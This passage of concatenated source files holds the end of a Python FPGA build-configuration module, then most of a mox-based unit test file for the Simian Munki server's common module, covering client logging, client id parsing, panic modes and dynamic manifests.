self._add_member('tcl_files' , PathList, "Extra TCL scripts")
self._add_member('family' , str, 'FPGA device family')
self._add_member('device' , str, 'FPGA device identifier')
self._add_member('package' , str, 'FPGA device package')
self._add_member('speed' , str, 'FPGA device speed grade')
self._add_member('top_module', str, 'RTL top-level module')
if items:
self.load_dict(items)
self.export_files = self.ucf_files
class QuartusSection(ToolSection):
TAG = 'quartus'
def __init__(self, items=None):
super(QuartusSection, self).__init__()
self._add_member('qsys_files', PathList, "Qsys IP description files")
self._add_member('sdc_files' , PathList, "SDC constraint files")
self._add_member('tcl_files' , PathList, "Extra script files")
self._add_member('quartus_options', str, 'Quartus command-line options')
self._add_member('family' , str, 'FPGA device family')
self._add_member('device' , str, 'FPGA device identifier')
self._add_member('top_module' , str, 'RTL top-level module')
if items:
self.load_dict(items)
self.export_files = self.qsys_files + self.sdc_files
class ParameterSection(Section):
TAG = 'parameter'
named = True
def __init__(self, items=None):
super(ParameterSection, self).__init__()
self._add_member('datatype' , str, 'Data type of argument (int, str, bool, file')
self._add_member('description', str, 'Parameter description')
self._add_member('paramtype' , str, 'Type of parameter (plusarg, vlogparam, generic, cmdlinearg')
self._add_member('scope' , str, 'Visibility of parameter. Private parameters are only visible when this core is the top-level. Public parameters are visible also when this core is pulled in as a dependency of another core')
if items:
self.load_dict(items)
def load_section(config, section_name, name='<unknown>'):
tmp = section_name.split(' ')
_type = tmp[0]
if len(tmp) == 2:
_name = tmp[1]
else:
_name = None
cls = SECTION_MAP.get(_type)
if cls is None:
#Note: The following sections are not in section.py yet
if not section_name in ['plusargs', 'simulator', 'provider']:
pr_warn("Unknown section '{}' in '{}'".format(section_name, name))
return None
items = config.get_section(section_name)
section = cls(items)
if section.warnings:
for warning in section.warnings:
pr_warn('Warning: %s in %s' % (warning, name))
if _name:
return (section, _name)
else:
return section
def load_all(config, name='<unknown>'):
for section_name in config.sections():
section = load_section(config, section_name, name)
if section:
yield section
SECTION_MAP = {}
def _register_subclasses(parent):
for cls in parent.__subclasses__():
_register_subclasses(cls)
if cls.TAG is None:
continue
SECTION_MAP[cls.TAG] = cls
_register_subclasses(Section)
if __name__ == "__main__":
typenames = {str : 'String',
FileList : 'Space-separated list of files',
PathList : 'Space-separated list of paths',
SimulatorList : 'Space-separated list',
SourceType : 'String',
StringList : 'Space-separated list',
list : 'List'}
SECTION_TEMPLATE = """
{}
{}
[cols="2,1,5",options="header"]
|==============================
|Name | Type | Description
{}
|==============================
"""
for k,v in sorted(SECTION_MAP.items()):
c = v()
s="\n".join(["|{} | {} | {}".format(k2, typenames[v2['type']], v2['desc']) for k2, v2 in sorted(c._members.items())])
print(SECTION_TEMPLATE.format(k, '-'*len(k), s))
| gpl-3.0 | 5,162,023,645,944,932,000 | 36.142566 | 250 | 0.570763 | false |
sillywilly42/simian | src/tests/simian/mac/munki/common_test.py | 1 | 48113 | #!/usr/bin/env python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Munki common module tests."""
import datetime
import logging
import tests.appenginesdk
from google.apputils import app
from tests.simian.mac.common import test
from simian.mac.munki import common
logging.basicConfig(filename='/dev/null')
class CommonModuleTest(test.RequestHandlerTest):
def GetTestClassInstance(self):
return self.mox.CreateMockAnything()
def GetTestClassModule(self):
return common
def testGetBoolValueFromString(self):
"""Tests GetBoolValueFromString() in various ways."""
self.assertTrue(common.GetBoolValueFromString('TrUe'))
self.assertTrue(common.GetBoolValueFromString('1'))
self.assertFalse(common.GetBoolValueFromString('FalSe'))
self.assertFalse(common.GetBoolValueFromString('0'))
self.assertEqual(common.GetBoolValueFromString(''), None)
self.assertEqual(common.GetBoolValueFromString(None), None)
def testSaveFirstConnectionWithSkipSerial(self):
"""Tests _SaveFirstConnection() with a serial in skip_serials = []."""
self.mox.StubOutWithMock(common.models, 'FirstClientConnection')
client_id = {
'uuid': 'uuid', 'owner': 'foouser', 'hostname': 'foohost',
'site': 'foosite'
}
class MockComputer(object):
serial = common.DUPE_SERIAL_NUMBER_EXCEPTIONS[0]
mock_computer = MockComputer()
mock_entity = self.mox.CreateMockAnything()
common.models.FirstClientConnection(key_name=client_id['uuid']).AndReturn(
mock_entity)
mock_entity.put().AndReturn(None)
self.mox.ReplayAll()
common._SaveFirstConnection(client_id, mock_computer)
self.assertEqual(mock_entity.computer, mock_computer)
self.assertEqual(mock_entity.owner, client_id['owner'])
self.assertEqual(mock_entity.hostname, client_id['hostname'])
self.assertEqual(mock_entity.site, client_id['site'])
self.mox.VerifyAll()
def testSaveFirstConnectionMarkingDupesInactive(self):
"""Tests _SaveFirstConnection(), marking dupe serial numbers as inactive."""
self.mox.StubOutWithMock(common.models, 'FirstClientConnection')
self.mox.StubOutWithMock(common.models.Computer, 'AllActive')
now = datetime.datetime.utcnow()
dupe_serial = 'fooserial'
client_id = {
'uuid': 'uuid', 'owner': 'foouser', 'hostname': 'foohost',
'site': 'foosite'
}
mock_computer = self.mox.CreateMockAnything()
mock_computer.uuid = 'this is a unique id'
mock_computer.preflight_datetime = now
mock_computer.serial = 'foobar serial'
mock_entity = self.mox.CreateMockAnything()
common.models.FirstClientConnection(key_name=client_id['uuid']).AndReturn(
mock_entity)
mock_entity.put().AndReturn(None)
dupe1 = self.mox.CreateMockAnything()
dupe1.uuid = 'diff'
dupe1.preflight_datetime = now - datetime.timedelta(days=0, minutes=1)
dupe1.serial = dupe_serial
dupe2 = self.mox.CreateMockAnything()
dupe2.uuid = 'diff again'
dupe2.preflight_datetime = now - datetime.timedelta(days=21)
dupe2.serial = dupe_serial
# same_serials contains mock_computer, but put() shouldn't be called again.
same_serials = [mock_computer, dupe1, dupe2]
mock_query = self.mox.CreateMockAnything()
common.models.Computer.AllActive().AndReturn(mock_query)
mock_query.filter('serial =', mock_computer.serial).AndReturn(same_serials)
dupe1.put(update_active=False).AndReturn(None)
dupe2.put(update_active=False).AndReturn(None)
self.mox.ReplayAll()
common._SaveFirstConnection(client_id, mock_computer)
self.assertTrue(mock_computer.active)
self.assertFalse(dupe1.active)
self.assertFalse(dupe2.active)
self.mox.VerifyAll()
def testLogClientConnectionWithInvalidUuid(self):
"""Tests LogClientConnection() function with an invalid uuid."""
client_id = {'uuid': ''}
event = 'custom'
self.mox.StubOutWithMock(common.logging, 'warning')
common.logging.warning(
'LogClientConnection: uuid is unknown, skipping log')
self.mox.ReplayAll()
common.LogClientConnection(event, client_id)
self.mox.VerifyAll()
def testLogClientConnectionPreflight(self):
"""Tests LogClientConnection() function."""
user_settings = {'foo': True}
event = 'preflight'
uuid = 'foo-uuid'
hostname = 'foohostname'
serial = 'serial'
owner = 'foouser'
track = 'footrack'
config_track = 'footrack'
site = 'NYC'
os_version = '10.6.3'
client_version = '0.6.0.759.0'
on_corp = True
last_notified_datetime_str = '2010-11-03 15:15:10'
last_notified_datetime = datetime.datetime(2010, 11, 03, 15, 15, 10)
uptime = 123
root_disk_free = 456
user_disk_free = 789
ip_address = 'fooip'
runtype = 'auto'
report_feedback = {'force_continue': True}
client_id = {
'uuid': uuid, 'hostname': hostname, 'serial': serial, 'owner': owner,
'track': track, 'config_track': config_track, 'os_version': os_version,
'client_version': client_version, 'on_corp': on_corp,
'last_notified_datetime': last_notified_datetime_str,
'site': site, 'uptime': uptime,
'root_disk_free': root_disk_free, 'user_disk_free': user_disk_free,
'runtype': runtype,
}
connection_datetimes = range(1, common.CONNECTION_DATETIMES_LIMIT + 1)
connection_dates = range(1, common.CONNECTION_DATES_LIMIT + 1)
# bypass the db.run_in_transaction step
self.stubs.Set(
common.models.db, 'run_in_transaction',
lambda fn, *args, **kwargs: fn(*args, **kwargs))
mock_computer = self.MockModelStatic('Computer', 'get_by_key_name', uuid)
mock_computer.connection_datetimes = connection_datetimes
mock_computer.connection_dates = connection_dates
mock_computer.connections_on_corp = 2
mock_computer.connections_off_corp = 2
mock_computer.preflight_count_since_postflight = 3
mock_computer.put().AndReturn(None)
self.mox.ReplayAll()
common.LogClientConnection(
event, client_id, user_settings=user_settings, ip_address=ip_address,
report_feedback=report_feedback)
self.assertEquals(uuid, mock_computer.uuid)
self.assertEquals(ip_address, mock_computer.ip_address)
self.assertEquals(runtype, mock_computer.runtype)
self.assertEquals(hostname, mock_computer.hostname)
self.assertEquals(serial, mock_computer.serial)
self.assertEquals(owner, mock_computer.owner)
self.assertEquals(track, mock_computer.track)
self.assertEquals(config_track, mock_computer.config_track)
self.assertEquals(site, mock_computer.site)
self.assertEquals(os_version, mock_computer.os_version)
self.assertEquals(client_version, mock_computer.client_version)
self.assertEquals(
last_notified_datetime, mock_computer.last_notified_datetime)
# Verify on_corp/off_corp counts.
self.assertEquals(2, mock_computer.connections_on_corp)
self.assertEquals(2, mock_computer.connections_off_corp)
self.assertEquals(
datetime.datetime, type(mock_computer.last_on_corp_preflight_datetime))
self.assertEquals(4, mock_computer.preflight_count_since_postflight)
self.mox.VerifyAll()
def testLogClientConnectionPostflight(self):
"""Tests LogClientConnection() function."""
event = 'postflight'
uuid = 'foo-uuid'
ip_address = 'fooip'
hostname = 'foohostname'
serial = 'serial'
owner = 'foouser'
track = 'footrack'
config_track = 'footrack'
site = 'NYC'
os_version = '10.6.3'
client_version = '0.6.0.759.0'
on_corp = True
last_notified_datetime_str = '2010-11-03 15:15:10'
last_notified_datetime = datetime.datetime(2010, 11, 03, 15, 15, 10)
uptime = 123
root_disk_free = 456
user_disk_free = 789
runtype = 'custom'
client_id = {
'uuid': uuid, 'hostname': hostname, 'serial': serial, 'owner': owner,
'track': track, 'config_track': config_track, 'os_version': os_version,
'client_version': client_version, 'on_corp': on_corp,
'last_notified_datetime': last_notified_datetime_str,
'site': site, 'uptime': uptime,
'root_disk_free': root_disk_free, 'user_disk_free': user_disk_free,
'runtype': runtype,
}
pkgs_to_install = ['FooApp1', 'FooApp2']
apple_updates_to_install = ['FooUpdate1', 'FooUpdate2']
all_pkgs_to_install = pkgs_to_install + [
common.APPLESUS_PKGS_TO_INSTALL_FORMAT % update
for update in apple_updates_to_install]
connection_datetimes = range(1, common.CONNECTION_DATETIMES_LIMIT + 1)
connection_dates = range(1, common.CONNECTION_DATES_LIMIT + 1)
# bypass the db.run_in_transaction step
self.stubs.Set(
common.models.db, 'run_in_transaction',
lambda fn, *args, **kwargs: fn(*args, **kwargs))
mock_computer = self.mox.CreateMockAnything()
mock_computer.connection_datetimes = connection_datetimes
mock_computer.connection_dates = connection_dates
mock_computer.connections_on_corp = None # test (None or 0) + 1
mock_computer.connections_off_corp = 0
mock_computer.put().AndReturn(None)
self.mox.ReplayAll()
common.LogClientConnection(
event, client_id, pkgs_to_install=pkgs_to_install,
apple_updates_to_install=apple_updates_to_install,
computer=mock_computer, ip_address=ip_address)
self.assertEquals(uuid, mock_computer.uuid)
self.assertEquals(ip_address, mock_computer.ip_address)
self.assertEquals(runtype, mock_computer.runtype)
self.assertEquals(hostname, mock_computer.hostname)
self.assertEquals(serial, mock_computer.serial)
self.assertEquals(owner, mock_computer.owner)
self.assertEquals(track, mock_computer.track)
self.assertEquals(config_track, mock_computer.config_track)
self.assertEquals(site, mock_computer.site)
self.assertEquals(os_version, mock_computer.os_version)
self.assertEquals(client_version, mock_computer.client_version)
self.assertEquals(
last_notified_datetime, mock_computer.last_notified_datetime)
# Verify that the first "datetime" was popped off.
self.assertEquals(connection_datetimes[0], 2)
# Verify that the last datetime is the new datetime.
new_datetime = connection_datetimes[common.CONNECTION_DATETIMES_LIMIT - 1]
self.assertEquals(type(new_datetime), datetime.datetime)
# Verify that the first "date" was popped off.
self.assertEquals(connection_dates[0], 2)
# Verify that the last date is the new date.
new_date = connection_dates[common.CONNECTION_DATES_LIMIT - 1]
self.assertEquals(type(new_date), datetime.datetime)
# Verify on_corp/off_corp counts.
self.assertEquals(1, mock_computer.connections_on_corp)
self.assertEquals(0, mock_computer.connections_off_corp)
self.assertEquals(all_pkgs_to_install, mock_computer.pkgs_to_install)
self.assertEquals(False, mock_computer.all_pkgs_installed)
self.assertEquals(0, mock_computer.preflight_count_since_postflight)
self.mox.VerifyAll()
def testLogClientConnectionPreflightAndNew(self):
"""Tests LogClientConnection() function."""
event = 'preflight'
uuid = 'foo-uuid'
ip_address = 'fooip'
hostname = 'foohostname'
serial = 'fooserial'
owner = 'foouser'
track = 'footrack'
config_track = 'footrack'
site = 'NYC'
os_version = '10.6.3'
client_version = '0.6.0.759.0'
on_corp = True
last_notified_datetime_str = '2010-11-03 15:15:10'
last_notified_datetime = datetime.datetime(
2010, 11, 03, 15, 15, 10)
uptime = 123
root_disk_free = 456
user_disk_free = 789
runtype = 'auto'
client_id = {
'uuid': uuid, 'hostname': hostname, 'serial': serial, 'owner': owner,
'track': track, 'config_track': config_track, 'os_version': os_version,
'client_version': client_version, 'on_corp': on_corp,
'last_notified_datetime': last_notified_datetime_str,
'site': site, 'uptime': uptime,
'root_disk_free': root_disk_free, 'user_disk_free': user_disk_free,
'runtype': runtype,
}
# bypass the db.run_in_transaction step
self.stubs.Set(
common.models.db, 'run_in_transaction',
lambda fn, *args, **kwargs: fn(*args, **kwargs))
self.MockModelStaticNone('Computer', 'get_by_key_name', uuid)
mock_computer = self.MockModel('Computer', key_name=uuid)
self.mox.StubOutWithMock(common.deferred, 'defer')
mock_computer.connection_datetimes = []
mock_computer.connection_dates = []
mock_computer.connections_on_corp = None
mock_computer.connections_off_corp = None
mock_computer.preflight_count_since_postflight = None
mock_computer.put().AndReturn(None)
common.deferred.defer(
common._SaveFirstConnection,
client_id=client_id, computer=mock_computer, _countdown=300,
_queue='first')
self.mox.ReplayAll()
common.LogClientConnection(event, client_id, ip_address=ip_address)
self.assertEquals(uuid, mock_computer.uuid)
self.assertEquals(ip_address, mock_computer.ip_address)
self.assertEquals(runtype, mock_computer.runtype)
self.assertEquals(hostname, mock_computer.hostname)
self.assertEquals(serial, mock_computer.serial)
self.assertEquals(owner, mock_computer.owner)
self.assertEquals(track, mock_computer.track)
self.assertEquals(config_track, mock_computer.config_track)
self.assertEquals(site, mock_computer.site)
self.assertEquals(os_version, mock_computer.os_version)
self.assertEquals(client_version, mock_computer.client_version)
self.assertEquals(
last_notified_datetime, mock_computer.last_notified_datetime)
# New client, so zero connection date/datetimes until after postflight.
self.assertEquals([], mock_computer.connection_datetimes)
self.assertEquals([], mock_computer.connection_dates)
# Verify on_corp/off_corp counts.
self.assertEquals(None, mock_computer.connections_on_corp)
self.assertEquals(None, mock_computer.connections_off_corp)
self.assertEquals(1, mock_computer.preflight_count_since_postflight)
self.mox.VerifyAll()
def testLogClientConnectionAsync(self):
"""Tests calling LogClientConnection(delay=2)."""
event = 'eventname'
client_id = {'uuid': 'fooo'}
ip_address = 'fooip'
utcnow = datetime.datetime(2010, 9, 2, 19, 30, 21, 377827)
self.mox.StubOutWithMock(datetime, 'datetime')
self.stubs.Set(common.deferred, 'defer', self.mox.CreateMockAnything())
deferred_name = 'log-client-conn-%s-%s' % (
client_id['uuid'], '2010-09-02-19-30-21')
common.datetime.datetime.utcnow().AndReturn(utcnow)
common.deferred.defer(
common.LogClientConnection, event, client_id, user_settings=None,
pkgs_to_install=None, apple_updates_to_install=None,
ip_address=ip_address, report_feedback=None,
_name=deferred_name, _countdown=2, cert_fingerprint=None)
self.mox.ReplayAll()
common.LogClientConnection(event, client_id, delay=2, ip_address=ip_address)
self.mox.VerifyAll()
def testKeyValueStringToDict(self):
"""Tests the KeyValueStringToDict() function."""
s = 'key=value::none=None::true=True::false=False'
expected_d = {
'key': 'value', 'none': None, 'true': 'True', 'false': 'False'}
d = common.KeyValueStringToDict(s, delimiter='::')
self.assertEqual(d, expected_d)
def _GetClientIdTestData(self):
"""Returns client id test data."""
client_id_str = (
'uuid=6c3327e9-6405-4f05-8374-142cbbd260c9|owner=foouser|'
'hostname=foohost|serial=1serial2|config_track=fooconfigtrack|track=%s|'
'os_version=10.6.3|client_version=0.6.0.759.0|on_corp=0|'
'last_notified_datetime=2010-01-01|site=NYC|'
'uptime=123.0|root_disk_free=456|user_disk_free=789|applesus=false|'
'runtype=auto|mgmt_enabled=true'
)
client_id_dict = {
u'uuid': u'6c3327e9-6405-4f05-8374-142cbbd260c9',
u'owner': u'foouser',
u'hostname': u'foohost',
u'serial': u'1serial2',
u'config_track': u'fooconfigtrack',
u'site': u'NYC',
u'os_version': u'10.6.3',
u'client_version': u'0.6.0.759.0',
u'on_corp': False,
u'last_notified_datetime': u'2010-01-01',
u'uptime': 123.0,
u'root_disk_free': 456,
u'user_disk_free': 789,
u'applesus': False,
u'runtype': 'auto',
u'mgmt_enabled': True,
}
return client_id_str, client_id_dict
def testParseClientIdWithUnicode(self):
"""Tests ParseClientId with some unicode characters."""
client_id_str, client_id_dict = self._GetClientIdTestData()
# Convert the client_id_str to unicode.
client_id_unicode = client_id_str.decode('utf-8')
# Replace foohost with a unicode O with umlaut, surrounded by zz.
client_id_unicode = client_id_str.replace('foohost', u'zz\u00D6zz')
cid = client_id_unicode % u'stable'
client_id_dict[u'track'] = u'stable'
client_id_dict[u'hostname'] = u'zz\xd6zz'
self.assertEqual(client_id_dict, common.ParseClientId(cid))
def testParseClientIdNoneBool(self):
"""Tests ParseClientId with on_corp=<missing>."""
client_id_str, client_id_dict = self._GetClientIdTestData()
client_id_str = client_id_str.replace('on_corp=0', 'on_corp=')
client_id_dict['on_corp'] = None
cid = client_id_str % 'stable'
client_id_dict['track'] = 'stable'
self.assertEqual(client_id_dict, common.ParseClientId(cid))
def testParseClientIdNewline(self):
"""Tests ParseClientId when newline in the string."""
client_id_str, client_id_dict = self._GetClientIdTestData()
client_id_str = client_id_str.replace(
'hostname=foohost', 'hostname=foo\nhost')
client_id_dict['hostname'] = 'foo_host'
cid = client_id_str % 'stable'
client_id_dict['track'] = 'stable'
self.assertEqual(client_id_dict, common.ParseClientId(cid))
def testParseClientIdOnCorp(self):
"""Tests ParseClientId with on_corp=1."""
client_id_str, client_id_dict = self._GetClientIdTestData()
client_id_str = client_id_str.replace('on_corp=0', 'on_corp=1')
client_id_dict['on_corp'] = True
cid = client_id_str % 'stable'
client_id_dict['track'] = 'stable'
self.assertEqual(client_id_dict, common.ParseClientId(cid))
def testParseClientIdWithAppleSusTrue(self):
"""Tests ParseClientId with applesus=true."""
client_id_str, client_id_dict = self._GetClientIdTestData()
client_id_str = client_id_str.replace('applesus=false', 'applesus=true')
client_id_dict['applesus'] = True
cid = client_id_str % 'stable'
client_id_dict['track'] = 'stable'
self.assertEqual(client_id_dict, common.ParseClientId(cid))
def testParseClientIdWithValidClientIdAllValidTracks(self):
"""Tests ParseClientId() with a valid client id; tests all valid tracks."""
client_id_str, client_id_dict = self._GetClientIdTestData()
for track in common.common.TRACKS:
cid = client_id_str % track
client_id_dict['track'] = track
self.assertEqual(client_id_dict, common.ParseClientId(cid))
def testParseClientIdWithUuidOverride(self):
"""Tests ParseClientId() with uuid override."""
uuid_override = 'foouuidbar'
uuid_override_full = 'CN=%s' % uuid_override
client_id_str, client_id_dict = self._GetClientIdTestData()
client_id_dict['uuid'] = uuid_override
for track in common.common.TRACKS:
cid = client_id_str % track
client_id_dict['track'] = track
self.assertEqual(
client_id_dict, common.ParseClientId(cid, uuid=uuid_override_full))
def testParseClientIdWithInvalidType(self):
"""Tests ParseClientId() with an invalid type; checks for None."""
client_id_str, client_id_dict = self._GetClientIdTestData()
client_id_str = client_id_str.replace('uptime=123.0', 'uptime=hello')
client_id_dict['uptime'] = None
for track in common.common.TRACKS:
cid = client_id_str % track
client_id_dict['track'] = track
self.assertEqual(client_id_dict, common.ParseClientId(cid))
def testParseClientIdWithoutRequiredFields(self):
"""Tests ParseClientId() without required fields."""
client_id_dict = {}
for key in common.CLIENT_ID_FIELDS.keys():
client_id_dict[key] = None
client_id_dict['track'] = common.common.DEFAULT_TRACK
# empty cid
self.assertEqual(client_id_dict, common.ParseClientId(''))
# empty cid with delimiters
self.assertEqual(client_id_dict, common.ParseClientId('|||'))
# cid with unknown key name
client_id_dict['ASDFMOOCOW'] = '1'
self.assertEqual(client_id_dict, common.ParseClientId('ASDFMOOCOW=1'))
del client_id_dict['ASDFMOOCOW']
def testParseClientIdWithVeryLongStrValues(self):
"""Tests ParseClientId() with str values that are over 500 characters."""
long_owner = ''.join(str(i) for i in range(999))
client_id_str, client_id_dict = self._GetClientIdTestData()
client_id_str = client_id_str.replace(
'owner=foouser', 'owner=%s' % long_owner)
client_id_dict['owner'] = long_owner[:500]
client_id_dict['track'] = common.common.DEFAULT_TRACK
output = common.ParseClientId(client_id_str)
for k in client_id_dict:
self.assertEqual(client_id_dict[k], output.get(k))
def testIsPanicMode(self):
"""Tests IsPanicMode()."""
mode = common.PANIC_MODES[0]
k = '%s%s' % (common.PANIC_MODE_PREFIX, mode)
self.mox.StubOutWithMock(
common.models.KeyValueCache, 'MemcacheWrappedGet')
common.models.KeyValueCache.MemcacheWrappedGet(k).AndReturn(1)
common.models.KeyValueCache.MemcacheWrappedGet(k).AndReturn(None)
self.mox.ReplayAll()
self.assertTrue(common.IsPanicMode(mode))
self.assertFalse(common.IsPanicMode(mode))
self.assertRaises(ValueError, common.IsPanicMode, 'never a mode')
self.mox.VerifyAll()
def testSetPanicModeWhenValueError(self):
self.mox.ReplayAll()
self.assertRaises(ValueError, common.SetPanicMode, 'never a mode', True)
self.mox.VerifyAll()
def testSetPanicModeWhenEnable(self):
"""Tests SetPanicMode()."""
mode = common.PANIC_MODES[0]
k = '%s%s' % (common.PANIC_MODE_PREFIX, mode)
self.mox.StubOutWithMock(
common.models.KeyValueCache, 'get_by_key_name')
self.mox.StubOutWithMock(
common.models.KeyValueCache, 'ResetMemcacheWrap')
self.mox.StubOutWithMock(
common.models, 'KeyValueCache')
mock_entity = self.mox.CreateMockAnything()
common.models.KeyValueCache.get_by_key_name(k).AndReturn('existing')
common.models.KeyValueCache.ResetMemcacheWrap(k).AndReturn(None)
common.models.KeyValueCache.get_by_key_name(k).AndReturn(None)
common.models.KeyValueCache(key_name=k).AndReturn(mock_entity)
mock_entity.put().AndReturn(None)
common.models.KeyValueCache.ResetMemcacheWrap(k).AndReturn(None)
self.mox.ReplayAll()
common.SetPanicMode(mode, True)
common.SetPanicMode(mode, True)
self.assertEqual(mock_entity.text_value, '1')
self.mox.VerifyAll()
def testSetPanicModeWhenDisable(self):
"""Tests SetPanicMode()."""
mode = common.PANIC_MODES[0]
k = '%s%s' % (common.PANIC_MODE_PREFIX, mode)
self.mox.StubOutWithMock(
common.models.KeyValueCache, 'get_by_key_name')
self.mox.StubOutWithMock(
common.models.KeyValueCache, 'ResetMemcacheWrap')
self.mox.StubOutWithMock(
common.models, 'KeyValueCache')
mock_entity = self.mox.CreateMockAnything()
common.models.KeyValueCache.get_by_key_name(k).AndReturn(mock_entity)
mock_entity.delete()
common.models.KeyValueCache.ResetMemcacheWrap(k).AndReturn(None)
common.models.KeyValueCache.get_by_key_name(k).AndReturn(None)
common.models.KeyValueCache.ResetMemcacheWrap(k).AndReturn(None)
self.mox.ReplayAll()
common.SetPanicMode(mode, False)
common.SetPanicMode(mode, False)
self.mox.VerifyAll()
def testIsPanicModeNoPackages(self):
"""Test IsPanicModeNoPackages()."""
self.mox.StubOutWithMock(common, 'IsPanicMode')
common.IsPanicMode(common.PANIC_MODE_NO_PACKAGES).AndReturn(123)
self.mox.ReplayAll()
self.assertEqual(123, common.IsPanicModeNoPackages())
self.mox.VerifyAll()
def testSetPanicModeNoPackages(self):
"""Test SetPanicModeNoPackages()."""
enabled = 12345
self.mox.StubOutWithMock(common, 'SetPanicMode')
common.SetPanicMode(common.PANIC_MODE_NO_PACKAGES, enabled).AndReturn(0)
self.mox.ReplayAll()
common.SetPanicModeNoPackages(enabled)
self.mox.VerifyAll()
def testWriteMSULog(self):
"""Test WriteComputerMSULog()."""
self.mox.StubOutWithMock(common.util.Datetime, 'utcfromtimestamp')
uuid = 'uuid'
details = {
'event': 'event',
'source': 'source',
'user': 'user',
'time': '1292013344.12',
'desc': 'desc',
}
dt = common.datetime.datetime.utcnow()
key = '%s_%s_%s' % (uuid, details['source'], details['event'])
mock_model = self.mox.CreateMockAnything()
self.mox.StubOutWithMock(common.models, 'ComputerMSULog')
common.models.ComputerMSULog(key_name=key).AndReturn(mock_model)
common.util.Datetime.utcfromtimestamp('1292013344.12').AndReturn(dt)
mock_model.mtime = None
mock_model.put().AndReturn(None)
self.mox.ReplayAll()
common.WriteComputerMSULog(uuid, details)
self.assertEqual(mock_model.uuid, uuid)
self.assertEqual(mock_model.event, details['event'])
self.assertEqual(mock_model.source, details['source'])
self.assertEqual(mock_model.user, details['user'])
self.assertEqual(mock_model.desc, details['desc'])
self.assertEqual(mock_model.mtime, dt)
self.mox.VerifyAll()
def testWriteMSULogWhenOlder(self):
"""Test WriteComputerMSULog()."""
uuid = 'uuid'
details = {
'event': 'event',
'source': 'source',
'user': 'user',
'time': 1292013344.12,
'desc': 'desc',
}
key = '%s_%s_%s' % (uuid, details['source'], details['event'])
mock_model = self.mox.CreateMockAnything()
self.mox.StubOutWithMock(common.models, 'ComputerMSULog')
common.models.ComputerMSULog(key_name=key).AndReturn(mock_model)
mock_model.mtime = common.datetime.datetime(2011, 1, 1, 0, 0, 0)
self.mox.ReplayAll()
common.WriteComputerMSULog(uuid, details)
self.mox.VerifyAll()
def testModifyList(self):
"""Tests _ModifyList()."""
l = []
common._ModifyList(l, 'yes')
common._ModifyList(l, 'no')
self.assertEqual(l, ['yes', 'no']) # test modify add.
common._ModifyList(l, '-no')
self.assertEqual(l, ['yes']) # test modify remove.
common._ModifyList(l, '-This value does not exist')
self.assertEqual(l, ['yes']) # test modify remove of non-existent value.
def testGenerateDynamicManifest(self):
"""Tests GenerateDynamicManifest()."""
plist_xml = 'fooxml'
manifest = 'stable'
site = 'foosite'
os_version = '10.6.5'
owner = 'foouser'
uuid = '12345'
client_id = {
'track': manifest, 'site': site, 'os_version': os_version,
'owner': owner, 'uuid': uuid,
}
blocked_package_name = 'FooBlockedPkg'
user_settings = {
'BlockPackages': [blocked_package_name]
}
install_type_optional_installs = 'optional_installs'
install_type_managed_updates = 'managed_updates'
value_one = 'foopkg'
site_mod_one = self.mox.CreateMockAnything()
site_mod_one.manifests = [manifest]
site_mod_one.enabled = True
site_mod_one.install_types = [install_type_optional_installs]
site_mod_one.value = value_one
site_mod_disabled = self.mox.CreateMockAnything()
site_mod_disabled.enabled = False
site_mods = [site_mod_one, site_mod_disabled]
self.mox.StubOutWithMock(
common.models.SiteManifestModification, 'MemcacheWrappedGetAllFilter')
common.models.SiteManifestModification.MemcacheWrappedGetAllFilter(
(('site =', site),)).AndReturn(site_mods)
os_version_mod_one = self.mox.CreateMockAnything()
os_version_mod_one.manifests = [manifest]
os_version_mod_one.enabled = True
os_version_mod_one.install_types = [install_type_managed_updates]
os_version_mod_one.value = 'foo os version pkg'
os_version_mods = [os_version_mod_one]
self.mox.StubOutWithMock(
common.models.OSVersionManifestModification,
'MemcacheWrappedGetAllFilter')
common.models.OSVersionManifestModification.MemcacheWrappedGetAllFilter(
(('os_version =', os_version),)).AndReturn(os_version_mods)
owner_mod_one = self.mox.CreateMockAnything()
owner_mod_one.manifests = [manifest]
owner_mod_one.enabled = True
owner_mod_one.install_types = [
install_type_optional_installs, install_type_managed_updates]
owner_mod_one.value = 'foo owner pkg'
owner_mods = [owner_mod_one]
self.mox.StubOutWithMock(
common.models.OwnerManifestModification,
'MemcacheWrappedGetAllFilter')
common.models.OwnerManifestModification.MemcacheWrappedGetAllFilter(
(('owner =', client_id['owner']),)).AndReturn(owner_mods)
uuid_mod_one = self.mox.CreateMockAnything()
uuid_mod_one.enabled = False
uuid_mods = [uuid_mod_one]
self.mox.StubOutWithMock(
common.models.UuidManifestModification,
'MemcacheWrappedGetAllFilter')
common.models.UuidManifestModification.MemcacheWrappedGetAllFilter(
(('uuid =', client_id['uuid']),)).AndReturn(uuid_mods)
computer_tags = ['footag1', 'footag2']
self.mox.StubOutWithMock(common.models.Tag, 'GetAllTagNamesForKey')
self.mox.StubOutWithMock(common.models.db.Key, 'from_path')
common.models.db.Key.from_path('Computer', client_id['uuid']).AndReturn('k')
common.models.Tag.GetAllTagNamesForKey('k').AndReturn(computer_tags)
tag_mod_one = self.mox.CreateMockAnything()
tag_mod_one.enabled = False
tag_mods = [tag_mod_one]
self.mox.StubOutWithMock(
common.models.TagManifestModification,
'MemcacheWrappedGetAllFilter')
common.models.TagManifestModification.MemcacheWrappedGetAllFilter(
(('tag_key_name =', 'footag1'),)).AndReturn([])
common.models.TagManifestModification.MemcacheWrappedGetAllFilter(
(('tag_key_name =', 'footag2'),)).AndReturn(tag_mods)
mock_plist = self.mox.CreateMockAnything()
managed_installs = ['FooPkg', blocked_package_name]
self.mox.StubOutWithMock(common.plist_module, 'UpdateIterable')
self.mox.StubOutWithMock(common.plist_module, 'MunkiManifestPlist')
common.plist_module.MunkiManifestPlist(plist_xml).AndReturn(mock_plist)
mock_plist.Parse().AndReturn(None)
common.plist_module.UpdateIterable(
mock_plist, site_mod_one.install_types[0], site_mod_one.value,
default=[], op=common._ModifyList)
common.plist_module.UpdateIterable(
mock_plist, os_version_mod_one.install_types[0],
os_version_mod_one.value, default=[], op=common._ModifyList)
common.plist_module.UpdateIterable(
mock_plist, owner_mod_one.install_types[0],
owner_mod_one.value, default=[], op=common._ModifyList)
common.plist_module.UpdateIterable(
